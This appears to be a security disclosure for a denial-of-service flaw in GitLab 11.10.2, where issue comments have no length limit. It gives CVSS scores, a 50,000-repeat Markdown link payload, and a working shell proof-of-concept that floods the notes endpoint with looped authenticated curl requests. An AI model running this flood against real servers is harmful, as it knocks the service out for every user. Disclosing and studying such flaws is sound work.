6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:N/I:N/A:P
0.001 Low
EPSS
Percentile
32.6%
There is no limit to the number of characters in the issue comments, which allows a DoS attack. The DoS attack affects both server-side and client-side.
NOTE: This bug happens on GitLab.com.
▼Attack for Client-side
[a](/a/a/a/a/a/a/a/a/a/a/a/a/a/a.....(50000 times))
Result: I received an error message “Something went wrong while fetching comments. Please try again.” And I could not fetch all the comments.
Note: In Step 5, if you can not post the comment from the browser, send the HTTP request directly in some way.
Note: The string to post in step 5 is described in the attached file F481358.
▼Attack for Server-side
An attacker can exhaust server resources by continuously sending the requests generated in Step 5 of [Attack for Client-side]. This causes a denial of service to all users.
For example, you can verify it with a script as below:
#!/bin/sh
charBlock=$(head -c 50000 /dev/zero | sed -e 's/\x00/\/a/g')
payload='[a]('$charBlock')'
gitlabHost=$1
ProjectURL=$2
targetID=$3
loop=$4
curl=`cat << EOS
curl
--insecure
--silent
--output /dev/null
${ProjectURL}/notes?target_id=${targetID}\&target_type=issue
--header 'Host: ${gitlabHost}'
--header 'X-CSRF-Token: [PLACEHOLDER]'
-b '_gitlab_session=[PLACEHOLDER]'
--data-binary 'note%5Bnoteable_type%5D=Issue¬e%5Bnoteable_id%5D=3¬e%5Bnote%5D=${payload}&merge_request_diff_head_sha=undefined'
EOS`
for i in `seq ${loop}`
do
eval ${curl}&
done
Run the above script with the following command to see that the server’s CPU is exhausted.
$ ./poc.sh [GitLab host] [Project URL] [target ID(※1)] [Repeat count of request]
※1: Get from the request generated in step 5 of [Client-side attack].
System information
System:
Current User: git
Using RVM: no
Ruby Version: 2.5.3p105
Gem Version: 2.7.6
Bundler Version:1.17.3
Rake Version: 12.3.2
Redis Version: 3.2.12
Git Version: 2.18.1
Sidekiq Version:5.2.5
Go Version: unknown
GitLab information
Version: 11.10.2
Revision: f3e84e78b62
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 9.6.11
URL: https://gitlab.example.com
HTTP Clone URL: https://gitlab.example.com/some-group/some-project.git
SSH Clone URL: [email protected]:some-group/some-project.git
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 9.0.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
All comments on Issue will be inaccessible.
The CPU is exhausted and users will be able to access the GitLab service.
NOTE: All users who can comment on the issue can exploit this vulnerability.
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:N/I:N/A:P
0.001 Low
EPSS
Percentile
32.6%